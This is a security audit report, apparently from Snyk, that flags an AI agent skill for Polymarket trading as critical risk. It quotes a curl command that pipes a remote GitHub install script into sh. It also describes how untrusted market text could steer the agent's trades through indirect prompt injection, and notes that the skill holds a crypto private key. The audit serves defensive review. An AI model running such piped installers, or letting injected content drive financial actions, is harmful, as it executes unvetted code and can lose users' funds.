dapp-polymarket
Fail
Audited by Snyk on Mar 15, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.90). The raw.githubusercontent.com link points to a direct .sh installer hosted under an unfamiliar user and is intended to be run (curl | sh), which is a high-risk pattern for malware distribution even though github.com/okx/plugin-store appears more legitimate; the unknown installer source makes the overall set suspicious.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill calls public Polymarket endpoints via commands like
plugin-store polymarket search/marketsand ingests user-generated market questions, outcome prices, andclobTokenIds(see Quickstart and Workflows A/C in SKILL.md), which the agent reads and uses to drive trading decisions (buy/sell), so untrusted third‑party content can influence actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs the command "curl -sSL https://raw.githubusercontent.com/purong-huang-1121/skills-store/main/install.sh | sh" at runtime to install/update plugin-store, which fetches and directly executes remote code and is treated as a required dependency.
MEDIUM W009: Direct money access capability detected (payment gateways, crypto, banking).
- Direct money access detected (high risk: 1.00). The skill is explicitly designed to perform trading on Polymarket: it includes commands to buy, sell, cancel orders, view orders/positions, and check/send balances. Trading commands require a Polygon EVM private key (EVM_PRIVATE_KEY) and operate with USDC on Polygon; API credentials are derived from the private key and transaction broadcasting is referenced. These are specific crypto/blockchain and market-order operations (placing/canceling market/limit orders and managing on-chain funds), which constitute direct financial execution authority.
Issues (4)
E005
CRITICALSuspicious download URL detected in skill instructions.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W009
MEDIUMDirect money access capability detected (payment gateways, crypto, banking).
Audit Metadata